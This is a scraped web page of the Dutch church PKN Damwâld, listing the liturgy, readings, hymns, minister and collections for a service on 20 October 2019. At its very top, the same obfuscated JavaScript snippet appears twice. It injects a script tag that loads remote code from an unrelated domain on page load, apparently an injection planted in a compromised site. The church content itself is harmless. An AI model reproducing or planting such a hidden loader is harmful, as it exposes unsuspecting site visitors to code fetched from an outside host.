;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 20 oktober 2019 14:00 uur - PKN Damwâld
zondag 20 oktober 2019
14:00 uur

Kerkdienst zondag 20 oktober 2019 14:00 uur

Informatie

Voorganger:Ds. M.J. Koppe
Organist:Jelte Cuperus
Liturgie
Lied voor de dienst Gezang 44 : 1 en 2
Welkom
Intochtslied : Psalm 98 : 1 en 4
Stil Gebed, Votum en Groet
We zingen: Elb 209 : 1, 2 en 3
Gebed
We lezen: Jesaja 44 : 6-8
We zingen: Psalm 100 : 1, 2, 3 en 4
We lezen: Openbaring 22 : 10-21
We zingen: Gezang 445 : 1, 2 en 3
Verkondiging .
We zingen: Elb 132 : 1, 2 en 3
Geloofsbelijdenis .
We zingen: Gezang 479 : 1, 3 en 4
Dankzegging en voorbeden
Collecte
We zingen: Elb 142 :1 (2x)
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Diaconie
Tweede collecte: Kerk
Uitganscollecte: Bouwfonds